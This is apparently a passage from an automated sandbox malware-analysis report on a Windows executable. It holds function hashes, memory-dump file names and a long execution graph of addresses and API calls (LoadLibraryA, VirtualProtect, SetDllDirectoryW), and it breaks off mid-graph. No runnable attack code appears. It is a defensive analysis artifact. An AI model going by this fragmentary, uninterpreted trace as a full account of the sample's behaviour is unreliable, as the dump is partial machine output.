                                                              • Opcode ID: 07ccd8f192e8e90d69bfd843d23e6c5cb8c086d03a1c4ecf0d47480cab5f9335
                                                              • Instruction ID: 1f03d44e165032d7eeec944408b60b3d3521c9fa64b7f28c6c1d81e73b34da24
                                                              • Opcode Fuzzy Hash: 07ccd8f192e8e90d69bfd843d23e6c5cb8c086d03a1c4ecf0d47480cab5f9335
                                                              • Instruction Fuzzy Hash: E921B123A0868381EB60DB15D04427E73A1FBCCB88F854035D6AD836E8EF7CE545C751
                                                              Function 00007FF6FB1EF068 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFileHeaderRaise
                                                              • String ID: csm
                                                              • API String ID: 2573137834-1018135373
                                                              • Opcode ID: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
                                                              • Instruction ID: 0d81c36123044be23eced6fa8f0323cd471005690991adf5f33c967407c1c9f3
                                                              • Opcode Fuzzy Hash: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
                                                              • Instruction Fuzzy Hash: A0114C36A18B4582EB218B15E54026D77E1FB88B98F184231DE9D47BA4EF3DE551C700
                                                              Function 00007FF6FB1FFA4C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: DriveType_invalid_parameter_noinfo
                                                              • String ID: :
                                                              • API String ID: 2595371189-336475711
                                                              • Opcode ID: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
                                                              • Instruction ID: 5efa9ca9b9e8c2a2314436d27ea6877620663d8825c206dae8e1fdef55b359fa
                                                              • Opcode Fuzzy Hash: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
                                                              • Instruction Fuzzy Hash: 93017822E1864786EB30EB60946127E63A0EF4C74CF841036D56DC26E1FEACE555CA14

                                                              Execution Graph

                                                              Execution Coverage:1.6%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:1.3%
                                                              Total number of Nodes:630
                                                              Total number of Limit Nodes:20
                                                              execution_graph 87721 7ffdfb354460 87722 7ffdfb355056 87721->87722 87729 7ffdfb354478 87721->87729 87723 7ffdfb354f63 LoadLibraryA 87724 7ffdfb354f7d 87723->87724 87727 7ffdfb354f9c GetProcAddress 87724->87727 87724->87729 87726 7ffdfb354fbe VirtualProtect VirtualProtect 87726->87722 87727->87724 87728 7ffdfb354fb3 87727->87728 87729->87723 87729->87726 87730 7ff6fb1e2d00 87731 7ff6fb1e2d10 87730->87731 87732 7ff6fb1e2d61 87731->87732 87733 7ff6fb1e2d4b 87731->87733 87735 7ff6fb1e2d81 87732->87735 87746 7ff6fb1e2d97 __std_exception_copy 87732->87746 87786 7ff6fb1e25f0 53 API calls _log10_special 87733->87786 87787 7ff6fb1e25f0 53 API calls _log10_special 87735->87787 87738 7ff6fb1e2d57 __std_exception_copy 87788 7ff6fb1eb870 87738->87788 87741 7ff6fb1e3069 87803 7ff6fb1e25f0 53 API calls _log10_special 87741->87803 87744 7ff6fb1e3053 87802 7ff6fb1e25f0 53 API calls _log10_special 87744->87802 87746->87738 87746->87741 87746->87744 87747 7ff6fb1e302d 87746->87747 87749 7ff6fb1e2f27 87746->87749 87758 7ff6fb1e1440 87746->87758 87782 7ff6fb1e1bf0 87746->87782 87801 7ff6fb1e25f0 53 API calls _log10_special 87747->87801 87750 7ff6fb1e2f93 87749->87750 87797 7ff6fb1f9714 37 API calls 2 library calls 87749->87797 87752 7ff6fb1e2fbe 87750->87752 87753 7ff6fb1e2fb0 87750->87753 87799 7ff6fb1e2af0 37 API calls 87752->87799 87798 7ff6fb1f9714 37 API calls 2 library calls 87753->87798 87756 7ff6fb1e2fbc 87800 7ff6fb1e2470 54 API calls __std_exception_copy 87756->87800 87804 7ff6fb1e3f70 87758->87804 87761 7ff6fb1e146b 87840 7ff6fb1e25f0 53 API calls _log10_special 87761->87840 87762 7ff6fb1e148c 87814 7ff6fb1ef9f4 87762->87814 87765 7ff6fb1e147b 87765->87746 87766 7ff6fb1e14a1 87767 7ff6fb1e14a5 87766->87767 87768 7ff6fb1e14c1 87766->87768 87841 7ff6fb1e2760 53 API calls 2 library calls 87767->87841 87770 7ff6fb1e14f1 87768->87770 87771 7ff6fb1e14d1 87768->87771 87774 7ff6fb1e14f7 87770->87774 87779 7ff6fb1e150a 87770->87779 87842 7ff6fb1e2760 53 API calls 2 library calls 87771->87842 87818 7ff6fb1e11f0 87774->87818 87775 7ff6fb1e1584 87775->87746 87777 7ff6fb1e14bc __std_exception_copy 87836 7ff6fb1ef36c 87777->87836 87779->87777 87780 7ff6fb1e1596 87779->87780 87843 7ff6fb1ef6bc 87779->87843 87846 7ff6fb1e2760 53 API calls 2 library calls 87780->87846 87783 7ff6fb1e1c15 87782->87783 88085 7ff6fb1f3ca4 87783->88085 87786->87738 87787->87738 87789 7ff6fb1eb879 87788->87789 87790 7ff6fb1ebc00 IsProcessorFeaturePresent 87789->87790 87791 7ff6fb1e2f1a 87789->87791 87792 7ff6fb1ebc18 87790->87792 88108 7ff6fb1ebdf8 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 87792->88108 87794 7ff6fb1ebc2b 88109 7ff6fb1ebbc0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 87794->88109 87797->87750 87798->87756 87799->87756 87800->87738 87801->87738 87802->87738 87803->87738 87805 7ff6fb1e3f7c 87804->87805 87847 7ff6fb1e86b0 87805->87847 87807 7ff6fb1e3fa4 87808 7ff6fb1e86b0 2 API calls 87807->87808 87809 7ff6fb1e3fb7 87808->87809 87852 7ff6fb1f52a4 87809->87852 87812 7ff6fb1eb870 _log10_special 8 API calls 87813 7ff6fb1e1463 87812->87813 87813->87761 87813->87762 87815 7ff6fb1efa24 87814->87815 88020 7ff6fb1ef784 87815->88020 87817 7ff6fb1efa3d 87817->87766 87819 7ff6fb1e1248 87818->87819 87820 7ff6fb1e124f 87819->87820 87821 7ff6fb1e1277 87819->87821 88037 7ff6fb1e25f0 53 API calls _log10_special 87820->88037 87824 7ff6fb1e1291 87821->87824 87825 7ff6fb1e12ad 87821->87825 87823 7ff6fb1e1262 87823->87777 88038 7ff6fb1e2760 53 API calls 2 library calls 87824->88038 87827 7ff6fb1e12bf 87825->87827 87834 7ff6fb1e12db memcpy_s 87825->87834 88039 7ff6fb1e2760 53 API calls 2 library calls 87827->88039 87829 7ff6fb1ef6bc _fread_nolock 53 API calls 87829->87834 87830 7ff6fb1e12a8 __std_exception_copy 87830->87777 87831 7ff6fb1e139f 88040 7ff6fb1e25f0 53 API calls _log10_special 87831->88040 87834->87829 87834->87830 87834->87831 87835 7ff6fb1ef430 37 API calls 87834->87835 88033 7ff6fb1efdfc 87834->88033 87835->87834 87837 7ff6fb1ef39c 87836->87837 88057 7ff6fb1ef148 87837->88057 87839 7ff6fb1ef3b5 87839->87775 87840->87765 87841->87777 87842->87777 88069 7ff6fb1ef6dc 87843->88069 87846->87777 87848 7ff6fb1e86d2 MultiByteToWideChar 87847->87848 87850 7ff6fb1e86f6 87847->87850 87848->87850 87851 7ff6fb1e870c __std_exception_copy 87848->87851 87849 7ff6fb1e8713 MultiByteToWideChar 87849->87851 87850->87849 87850->87851 87851->87807 87853 7ff6fb1f51d8 87852->87853 87854 7ff6fb1f51fe 87853->87854 87857 7ff6fb1f5231 87853->87857 87883 7ff6fb1f43f4 11 API calls _get_daylight 87854->87883 87856 7ff6fb1f5203 87884 7ff6fb1f9bf0 37 API calls _invalid_parameter_noinfo 87856->87884 87859 7ff6fb1f5244 87857->87859 87860 7ff6fb1f5237 87857->87860 87871 7ff6fb1f9f38 87859->87871 87885 7ff6fb1f43f4 11 API calls _get_daylight 87860->87885 87864 7ff6fb1e3fc6 87864->87812 87865 7ff6fb1f5265 87878 7ff6fb1ff1dc 87865->87878 87866 7ff6fb1f5258 87886 7ff6fb1f43f4 11 API calls _get_daylight 87866->87886 87869 7ff6fb1f5278 87887 7ff6fb1f4788 LeaveCriticalSection 87869->87887 87888 7ff6fb1ff5e8 EnterCriticalSection 87871->87888 87873 7ff6fb1f9f4f 87874 7ff6fb1f9fac 19 API calls 87873->87874 87875 7ff6fb1f9f5a 87874->87875 87876 7ff6fb1ff648 _isindst LeaveCriticalSection 87875->87876 87877 7ff6fb1f524e 87876->87877 87877->87865 87877->87866 87889 7ff6fb1feed8 87878->87889 87882 7ff6fb1ff236 87882->87869 87883->87856 87884->87864 87885->87864 87886->87864 87890 7ff6fb1fef13 __vcrt_InitializeCriticalSectionEx 87889->87890 87899 7ff6fb1ff0da 87890->87899 87904 7ff6fb1f6d4c 51 API calls 3 library calls 87890->87904 87892 7ff6fb1ff1b1 87908 7ff6fb1f9bf0 37 API calls _invalid_parameter_noinfo 87892->87908 87894 7ff6fb1ff0e3 87894->87882 87901 7ff6fb206064 87894->87901 87896 7ff6fb1ff145 87896->87899 87905 7ff6fb1f6d4c 51 API calls 3 library calls 87896->87905 87898 7ff6fb1ff164 87898->87899 87906 7ff6fb1f6d4c 51 API calls 3 library calls 87898->87906 87899->87894 87907 7ff6fb1f43f4 11 API calls _get_daylight 87899->87907 87909 7ff6fb205664 87901->87909 87904->87896 87905->87898 87906->87899 87907->87892 87908->87894 87910 7ff6fb20567b 87909->87910 87914 7ff6fb205699 87909->87914 87963 7ff6fb1f43f4 11 API calls _get_daylight 87910->87963 87912 7ff6fb205680 87964 7ff6fb1f9bf0 37 API calls _invalid_parameter_noinfo 87912->87964 87913 7ff6fb2056b5 87920 7ff6fb205c74 87913->87920 87914->87910 87914->87913 87918 7ff6fb20568c 87918->87882 87966 7ff6fb2059a8 87920->87966 87923 7ff6fb205d01 87986 7ff6fb1f7830 87923->87986 87924 7ff6fb205ce9 87998 7ff6fb1f43d4 11 API calls _get_daylight 87924->87998 87927 7ff6fb205cee 87999 7ff6fb1f43f4 11 API calls _get_daylight 87927->87999 87957 7ff6fb2056e0 87957->87918 87965 7ff6fb1f7808 LeaveCriticalSection 87957->87965 87963->87912 87964->87918 87967 7ff6fb2059d4 87966->87967 87968 7ff6fb2059ee 87966->87968 87967->87968 88011 7ff6fb1f43f4 11 API calls _get_daylight 87967->88011 87971 7ff6fb205a6c 87968->87971 88013 7ff6fb1f43f4 11 API calls _get_daylight 87968->88013 87970 7ff6fb2059e3 88012 7ff6fb1f9bf0 37 API calls _invalid_parameter_noinfo 87970->88012 87973 7ff6fb205abd 87971->87973 88015 7ff6fb1f43f4 11 API calls _get_daylight 87971->88015 87984 7ff6fb205b1a 87973->87984 88017 7ff6fb1f8e90 37 API calls 2 library calls 87973->88017 87976 7ff6fb205b16 87979 7ff6fb205b98 87976->87979 87976->87984 87978 7ff6fb205ab2 88016 7ff6fb1f9bf0 37 API calls _invalid_parameter_noinfo 87978->88016 88018 7ff6fb1f9c10 17 API calls __GetCurrentState 87979->88018 87980 7ff6fb205a61 88014 7ff6fb1f9bf0 37 API calls _invalid_parameter_noinfo 87980->88014 87984->87923 87984->87924 88019 7ff6fb1ff5e8 EnterCriticalSection 87986->88019 87998->87927 87999->87957 88011->87970 88012->87968 88013->87980 88014->87971 88015->87978 88016->87973 88017->87976 88021 7ff6fb1ef7ee 88020->88021 88022 7ff6fb1ef7ae 88020->88022 88021->88022 88024 7ff6fb1ef7fa 88021->88024 88032 7ff6fb1f9b24 37 API calls 2 library calls 88022->88032 88031 7ff6fb1f477c EnterCriticalSection 88024->88031 88026 7ff6fb1ef7d5 88026->87817 88027 7ff6fb1ef7ff 88028 7ff6fb1ef908 71 API calls 88027->88028 88029 7ff6fb1ef811 88028->88029 88030 7ff6fb1f4788 _fread_nolock LeaveCriticalSection 88029->88030 88030->88026 88032->88026 88034 7ff6fb1efe2c 88033->88034 88041 7ff6fb1efb4c 88034->88041 88036 7ff6fb1efe4a 88036->87834 88037->87823 88038->87830 88039->87830 88040->87830 88042 7ff6fb1efb6c 88041->88042 88043 7ff6fb1efb99 88041->88043 88042->88043 88044 7ff6fb1efba1 88042->88044 88045 7ff6fb1efb76 88042->88045 88043->88036 88048 7ff6fb1efa8c 88044->88048 88055 7ff6fb1f9b24 37 API calls 2 library calls 88045->88055 88056 7ff6fb1f477c EnterCriticalSection 88048->88056 88050 7ff6fb1efaa9 88051 7ff6fb1efacc 74 API calls 88050->88051 88052 7ff6fb1efab2 88051->88052 88053 7ff6fb1f4788 _fread_nolock LeaveCriticalSection 88052->88053 88054 7ff6fb1efabd 88053->88054 88054->88043 88055->88043 88058 7ff6fb1ef163 88057->88058 88059 7ff6fb1ef191 88057->88059 88068 7ff6fb1f9b24 37 API calls 2 library calls 88058->88068 88066 7ff6fb1ef183 88059->88066 88067 7ff6fb1f477c EnterCriticalSection 88059->88067 88062 7ff6fb1ef1a8 88063 7ff6fb1ef1c4 72 API calls 88062->88063 88064 7ff6fb1ef1b4 88063->88064 88065 7ff6fb1f4788 _fread_nolock LeaveCriticalSection 88064->88065 88065->88066 88066->87839 88068->88066 88070 7ff6fb1ef6d4 88069->88070 88071 7ff6fb1ef706 88069->88071 88070->87779 88071->88070 88072 7ff6fb1ef715 memcpy_s 88071->88072 88073 7ff6fb1ef752 88071->88073 88083 7ff6fb1f43f4 11 API calls _get_daylight 88072->88083 88082 7ff6fb1f477c EnterCriticalSection 88073->88082 88076 7ff6fb1ef75a 88078 7ff6fb1ef45c _fread_nolock 51 API calls 88076->88078 88077 7ff6fb1ef72a 88084 7ff6fb1f9bf0 37 API calls _invalid_parameter_noinfo 88077->88084 88080 7ff6fb1ef771 88078->88080 88081 7ff6fb1f4788 _fread_nolock LeaveCriticalSection 88080->88081 88081->88070 88083->88077 88084->88070 88089 7ff6fb1f3cfe 88085->88089 88086 7ff6fb1f3d23 88103 7ff6fb1f9b24 37 API calls 2 library calls 88086->88103 88088 7ff6fb1f3d5f 88104 7ff6fb1f1f30 49 API calls _invalid_parameter_noinfo 88088->88104 88089->88086 88089->88088 88091 7ff6fb1f3df6 88095 7ff6fb1f3e08 88091->88095 88097 7ff6fb1f3e3c 88091->88097 88098 7ff6fb1f3e60 88091->88098 88099 7ff6fb1f3e11 88091->88099 88092 7ff6fb1f3d4d 88093 7ff6fb1eb870 _log10_special 8 API calls 88092->88093 88096 7ff6fb1e1c38 88093->88096 88095->88097 88095->88099 88096->87746 88107 7ff6fb1f9c58 11 API calls 2 library calls 88097->88107 88098->88097 88100 7ff6fb1f3e6a 88098->88100 88105 7ff6fb1f9c58 11 API calls 2 library calls 88099->88105 88106 7ff6fb1f9c58 11 API calls 2 library calls 88100->88106 88103->88092 88104->88091 88105->88092 88106->88092 88107->88092 88108->87794 88110 7ff6fb1ebf5c 88131 7ff6fb1ec12c 88110->88131 88113 7ff6fb1ec0a8 88250 7ff6fb1ec44c 7 API calls 2 library calls 88113->88250 88114 7ff6fb1ebf78 __scrt_acquire_startup_lock 88116 7ff6fb1ec0b2 88114->88116 88123 7ff6fb1ebf96 __scrt_release_startup_lock 88114->88123 88251 7ff6fb1ec44c 7 API calls 2 library calls 88116->88251 88118 7ff6fb1ebfbb 88119 7ff6fb1ec0bd __GetCurrentState 88120 7ff6fb1ec041 88137 7ff6fb1ec594 88120->88137 88122 7ff6fb1ec046 88140 7ff6fb1e1000 88122->88140 88123->88118 88123->88120 88247 7ff6fb1f8e44 45 API calls 88123->88247 88128 7ff6fb1ec069 88128->88119 88249 7ff6fb1ec2b0 7 API calls 88128->88249 88130 7ff6fb1ec080 88130->88118 88132 7ff6fb1ec134 88131->88132 88133 7ff6fb1ec140 __scrt_dllmain_crt_thread_attach 88132->88133 88134 7ff6fb1ebf70 88133->88134 88135 7ff6fb1ec14d 88133->88135 88134->88113 88134->88114 88135->88134 88252 7ff6fb1ecba8 7 API calls 2 library calls 88135->88252 88253 7ff6fb2097e0 88137->88253 88139 7ff6fb1ec5ab GetStartupInfoW 88139->88122 88141 7ff6fb1e1009 88140->88141 88255 7ff6fb1f4794 88141->88255 88143 7ff6fb1e352b 88262 7ff6fb1e33e0 88143->88262 88147 7ff6fb1eb870 _log10_special 8 API calls 88149 7ff6fb1e372a 88147->88149 88248 7ff6fb1ec5d8 GetModuleHandleW 88149->88248 88150 7ff6fb1e356c 88153 7ff6fb1e1bf0 49 API calls 88150->88153 88151 7ff6fb1e3736 88152 7ff6fb1e3f70 108 API calls 88151->88152 88154 7ff6fb1e3746 88152->88154 88170 7ff6fb1e3588 88153->88170 88155 7ff6fb1e3785 88154->88155 88348 7ff6fb1e76a0 88154->88348 88357 7ff6fb1e25f0 53 API calls _log10_special 88155->88357 88159 7ff6fb1e3778 88162 7ff6fb1e379f 88159->88162 88163 7ff6fb1e377d 88159->88163 88160 7ff6fb1e3538 88160->88147 88161 7ff6fb1e365f __std_exception_copy 88165 7ff6fb1e3844 88161->88165 88168 7ff6fb1e7e10 14 API calls 88161->88168 88164 7ff6fb1e1bf0 49 API calls 88162->88164 88166 7ff6fb1ef36c 74 API calls 88163->88166 88167 7ff6fb1e37be 88164->88167 88361 7ff6fb1e3e90 49 API calls 88165->88361 88166->88155 88176 7ff6fb1e18f0 115 API calls 88167->88176 88171 7ff6fb1e36ae 88168->88171 88324 7ff6fb1e7e10 88170->88324 88346 7ff6fb1e7f80 40 API calls __std_exception_copy 88171->88346 88172 7ff6fb1e3852 88174 7ff6fb1e3865 88172->88174 88175 7ff6fb1e3871 88172->88175 88362 7ff6fb1e3fe0 88174->88362 88179 7ff6fb1e1bf0 49 API calls 88175->88179 88180 7ff6fb1e37df 88176->88180 88177 7ff6fb1e36bd 88181 7ff6fb1e380f 88177->88181 88184 7ff6fb1e36cf 88177->88184 88195 7ff6fb1e3805 __std_exception_copy 88179->88195 88180->88170 88183 7ff6fb1e37ef 88180->88183 88359 7ff6fb1e8400 58 API calls _log10_special 88181->88359 88182 7ff6fb1e86b0 2 API calls 88186 7ff6fb1e389e SetDllDirectoryW 88182->88186 88358 7ff6fb1e25f0 53 API calls _log10_special 88183->88358 88188 7ff6fb1e1bf0 49 API calls 88184->88188 88194 7ff6fb1e38c3 88186->88194 88192 7ff6fb1e36f1 88188->88192 88189 7ff6fb1e3814 88360 7ff6fb1e7c40 84 API calls 2 library calls 88189->88360 88192->88195 88196 7ff6fb1e36fc 88192->88196 88198 7ff6fb1e3a50 88194->88198 88365 7ff6fb1e6560 53 API calls 88194->88365 88195->88182 88347 7ff6fb1e25f0 53 API calls _log10_special 88196->88347 88197 7ff6fb1e3834 88197->88165 88197->88195 88201 7ff6fb1e3a5a PostMessageW GetMessageW 88198->88201 88202 7ff6fb1e3a7d 88198->88202 88201->88202 88337 7ff6fb1e3080 88202->88337 88203 7ff6fb1e38d5 88366 7ff6fb1e6b00 118 API calls 2 library calls 88203->88366 88205 7ff6fb1e38ea 88207 7ff6fb1e3947 88205->88207 88209 7ff6fb1e3901 88205->88209 88367 7ff6fb1e65a0 121 API calls _log10_special 88205->88367 88207->88198 88215 7ff6fb1e395c 88207->88215 88222 7ff6fb1e3905 88209->88222 88368 7ff6fb1e6970 91 API calls 88209->88368 88213 7ff6fb1e3916 88213->88222 88369 7ff6fb1e6cd0 54 API calls 88213->88369 88214 7ff6fb1e3a97 88375 7ff6fb1e6780 FreeLibrary 88214->88375 88372 7ff6fb1e30e0 122 API calls 2 library calls 88215->88372 88218 7ff6fb1e3964 88218->88160 88221 7ff6fb1e396c 88218->88221 88220 7ff6fb1e3aa3 88373 7ff6fb1e83e0 LocalFree 88221->88373 88222->88207 88370 7ff6fb1e2870 53 API calls _log10_special 88222->88370 88225 7ff6fb1e393f 88371 7ff6fb1e6780 FreeLibrary 88225->88371 88247->88120 88248->88128 88249->88130 88250->88116 88251->88119 88252->88134 88254 7ff6fb2097d0 88253->88254 88254->88139 88254->88254 88259 7ff6fb1fe790 88255->88259 88256 7ff6fb1fe7e3 88376 7ff6fb1f9b24 37 API calls 2 library calls 88256->88376 88258 7ff6fb1fe80c 88258->88143 88259->88256 88260 7ff6fb1fe836 88259->88260 88377 7ff6fb1fe668 71 API calls _fread_nolock 88260->88377 88378 7ff6fb1ebb70 88262->88378 88265 7ff6fb1e341b 88385 7ff6fb1e29e0 51 API calls _log10_special 88265->88385 88266 7ff6fb1e3438 88380 7ff6fb1e85a0 FindFirstFileExW 88266->88380 88269 7ff6fb1e342e 88274 7ff6fb1eb870 _log10_special 8 API calls 88269->88274 88271 7ff6fb1e34a5 88388 7ff6fb1e8760 WideCharToMultiByte WideCharToMultiByte __std_exception_copy 88271->88388 88272 7ff6fb1e344b 88386 7ff6fb1e8620 CreateFileW GetFinalPathNameByHandleW CloseHandle 88272->88386 88277 7ff6fb1e34dd 88274->88277 88276 7ff6fb1e34b3 88276->88269 88389 7ff6fb1e26c0 49 API calls _log10_special 88276->88389 88277->88160 88284 7ff6fb1e18f0 88277->88284 88278 7ff6fb1e3458 88279 7ff6fb1e3474 __vcrt_InitializeCriticalSectionEx 88278->88279 88280 7ff6fb1e345c 88278->88280 88279->88271 88387 7ff6fb1e26c0 49 API calls _log10_special 88280->88387 88283 7ff6fb1e346d 88283->88269 88285 7ff6fb1e3f70 108 API calls 88284->88285 88286 7ff6fb1e1925 88285->88286 88288 7ff6fb1e76a0 83 API calls 88286->88288 88293 7ff6fb1e1bb6 88286->88293 88287 7ff6fb1eb870 _log10_special 8 API calls 88289 7ff6fb1e1bd1 88287->88289 88290 7ff6fb1e196b 88288->88290 88289->88150 88289->88151 88291 7ff6fb1ef9f4 73 API calls 88290->88291 88323 7ff6fb1e199c 88290->88323 88294 7ff6fb1e1985 88291->88294 88292 7ff6fb1ef36c 74 API calls 88292->88293 88293->88287 88295 7ff6fb1e19a1 88294->88295 88296 7ff6fb1e1989 88294->88296 88298 7ff6fb1ef6bc _fread_nolock 53 API calls 88295->88298 88390 7ff6fb1e2760 53 API calls 2 library calls 88296->88390 88299 7ff6fb1e19b9 88298->88299 88300 7ff6fb1e19bf 88299->88300 88301 7ff6fb1e19d7 88299->88301 88391 7ff6fb1e2760 53 API calls 2 library calls 88300->88391 88303 7ff6fb1e19ee 88301->88303 88304 7ff6fb1e1a06 88301->88304 88392 7ff6fb1e2760 53 API calls 2 library calls 88303->88392 88306 7ff6fb1e1bf0 49 API calls 88304->88306 88307 7ff6fb1e1a1d 88306->88307 88308 7ff6fb1e1bf0 49 API calls 88307->88308 88309 7ff6fb1e1a68 88308->88309 88310 7ff6fb1ef9f4 73 API calls 88309->88310 88311 7ff6fb1e1a8c 88310->88311 88312 7ff6fb1e1aa1 88311->88312 88313 7ff6fb1e1ab9 88311->88313 88393 7ff6fb1e2760 53 API calls 2 library calls 88312->88393 88315 7ff6fb1ef6bc _fread_nolock 53 API calls 88313->88315 88316 7ff6fb1e1ace 88315->88316 88317 7ff6fb1e1ad4 88316->88317 88318 7ff6fb1e1aec 88316->88318 88394 7ff6fb1e2760 53 API calls 2 library calls 88317->88394 88395 7ff6fb1ef430 88318->88395 88323->88292 88323->88323 88325 7ff6fb1e7e1a 88324->88325 88326 7ff6fb1e86b0 2 API calls 88325->88326 88327 7ff6fb1e7e39 GetEnvironmentVariableW 88326->88327 88328 7ff6fb1e7ea2 88327->88328 88329 7ff6fb1e7e56 ExpandEnvironmentStringsW 88327->88329 88330 7ff6fb1eb870 _log10_special 8 API calls 88328->88330 88329->88328 88331 7ff6fb1e7e78 88329->88331 88332 7ff6fb1e7eb4 88330->88332 88404 7ff6fb1e8760 WideCharToMultiByte WideCharToMultiByte __std_exception_copy 88331->88404 88332->88161 88334 7ff6fb1e7e8a 88335 7ff6fb1eb870 _log10_special 8 API calls 88334->88335 88336 7ff6fb1e7e9a 88335->88336 88336->88161 88405 7ff6fb1e5af0 88337->88405 88340 7ff6fb1e30b9 88374 7ff6fb1e33a0 FreeLibrary 88340->88374 88342 7ff6fb1e30a1 88342->88340 88475 7ff6fb1e5800 88342->88475 88344 7ff6fb1e30ad 88344->88340 88484 7ff6fb1e5990 53 API calls 88344->88484 88346->88177 88347->88160 88349 7ff6fb1e76c4 88348->88349 88350 7ff6fb1ef9f4 73 API calls 88349->88350 88355 7ff6fb1e779b __std_exception_copy 88349->88355 88351 7ff6fb1e76e0 88350->88351 88351->88355 88547 7ff6fb1f6bd8 88351->88547 88353 7ff6fb1ef9f4 73 API calls 88356 7ff6fb1e76f5 88353->88356 88354 7ff6fb1ef6bc _fread_nolock 53 API calls 88354->88356 88355->88159 88356->88353 88356->88354 88356->88355 88357->88160 88358->88160 88359->88189 88360->88197 88361->88172 88363 7ff6fb1e1bf0 49 API calls 88362->88363 88364 7ff6fb1e4010 88363->88364 88364->88195 88364->88364 88365->88203 88366->88205 88367->88209 88368->88213 88369->88222 88370->88225 88371->88207 88372->88218 88374->88214 88375->88220 88376->88258 88377->88258 88379 7ff6fb1e33ec GetModuleFileNameW 88378->88379 88379->88265 88379->88266 88381 7ff6fb1e85f2 88380->88381 88382 7ff6fb1e85df FindClose 88380->88382 88383 7ff6fb1eb870 _log10_special 8 API calls 88381->88383 88382->88381 88384 7ff6fb1e3442 88383->88384 88384->88271 88384->88272 88385->88269 88386->88278 88387->88283 88388->88276 88389->88269 88390->88323 88391->88323 88392->88323 88393->88323 88394->88323 88396 7ff6fb1ef439 88395->88396 88398 7ff6fb1e1b06 88395->88398 88402 7ff6fb1f43f4 11 API calls _get_daylight 88396->88402 88398->88323 88401 7ff6fb1e25f0 53 API calls _log10_special 88398->88401 88399 7ff6fb1ef43e 88403 7ff6fb1f9bf0 37 API calls _invalid_parameter_noinfo 88399->88403 88401->88323 88402->88399 88403->88398 88404->88334 88406 7ff6fb1e5b05 88405->88406 88407 7ff6fb1e1bf0 49 API calls 88406->88407 88408 7ff6fb1e5b41 88407->88408 88409 7ff6fb1e5b4a 88408->88409 88410 7ff6fb1e5b6d 88408->88410 88495 7ff6fb1e25f0 53 API calls _log10_special 88409->88495 88412 7ff6fb1e3fe0 49 API calls 88410->88412 88414 7ff6fb1e5b85 88412->88414 88413 7ff6fb1e5b63 88416 7ff6fb1eb870 _log10_special 8 API calls 88413->88416 88415 7ff6fb1e5ba3 88414->88415 88496 7ff6fb1e25f0 53 API calls _log10_special 88414->88496 88485 7ff6fb1e3f10 88415->88485 88419 7ff6fb1e308e 88416->88419 88419->88340 88436 7ff6fb1e5c80 88419->88436 88421 7ff6fb1e5bbb 88422 7ff6fb1e3fe0 49 API calls 88421->88422 88424 7ff6fb1e5bd4 88422->88424 88423 7ff6fb1e81a0 3 API calls 88423->88421 88425 7ff6fb1e5bf9 88424->88425 88426 7ff6fb1e5bd9 88424->88426 88491 7ff6fb1e81a0 88425->88491 88497 7ff6fb1e25f0 53 API calls _log10_special 88426->88497 88429 7ff6fb1e5c06 88430 7ff6fb1e5c12 88429->88430 88431 7ff6fb1e5c49 88429->88431 88432 7ff6fb1e86b0 2 API calls 88430->88432 88499 7ff6fb1e50b0 95 API calls 88431->88499 88434 7ff6fb1e5c2a 88432->88434 88498 7ff6fb1e29e0 51 API calls _log10_special 88434->88498 88500 7ff6fb1e4c80 88436->88500 88438 7ff6fb1e5cba 88439 7ff6fb1e5cd3 88438->88439 88440 7ff6fb1e5cc2 88438->88440 88507 7ff6fb1e4450 88439->88507 88532 7ff6fb1e25f0 53 API calls _log10_special 88440->88532 88444 7ff6fb1e5cdf 88533 7ff6fb1e25f0 53 API calls _log10_special 88444->88533 88445 7ff6fb1e5cf0 88448 7ff6fb1e5cff 88445->88448 88449 7ff6fb1e5d10 88445->88449 88447 7ff6fb1e5cce 88447->88342 88534 7ff6fb1e25f0 53 API calls _log10_special 88448->88534 88511 7ff6fb1e4700 88449->88511 88452 7ff6fb1e5d2b 88453 7ff6fb1e5d2f 88452->88453 88454 7ff6fb1e5d40 88452->88454 88535 7ff6fb1e25f0 53 API calls 